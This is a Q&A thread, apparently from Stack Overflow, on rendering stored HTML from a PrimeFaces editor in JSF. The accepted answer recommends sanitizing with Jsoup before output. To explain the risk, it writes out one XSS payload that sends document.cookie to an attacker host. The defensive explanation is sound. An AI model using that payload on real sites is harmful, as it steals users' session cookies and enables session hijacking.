# Interpret HTML Tags already saved in the oracle Database

Tags: html, primefaces, jsf-2.2

In my application, the user create an announce using the primefaces `<p:editor>` to be able to format and style the text. The text is being saved with its html tags and when I perform a select query I get the text with the tags not interpreted. Is there some function or converter to convert thoses tags in order to format the text returned from the database?

Answer (score 1, accepted):

Indeed, JSF by default escapes HTML special characters in order to prevent XSS attack holes caused by unaware developers. Imagine that the enduser entered among others the following in `<p:editor>`:

```
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
```

and your website literally interpreted that during redisplaying without any form of HTML-escaping, then the hacker would get all info about session cookie of the visitor of your webpage and easily perform a session hijacking attack.

Firstly, you need a HTML parser/sanitizer like [Jsoup](http://jsoup.org/) to prepare the submitted data before display (or save in DB, preferably in another column).

```
String sanitizedHTML = Jsoup.clean(unsafeHTML, Whitelist.basic());
```

Then you can safely display that sanitized HTML using `<h:outputText>` with `escape` attribute set to `false`:

```
<h:outputText value="#{bean.sanitizedHTML}" escape="false" />
```

#### See also:

- [How to implement a possibility for user to post some html-formatted data in a safe way?](https://stackoverflow.com/questions/3410526/how-to-implement-a-possibility-for-user-to-post-some-html-formatted-data-in-a-sa/)
- [CSRF, XSS and SQL Injection attack prevention in JSF](https://stackoverflow.com/questions/7722159/csrf-xss-and-sql-injection-attack-prevention-in-jsf)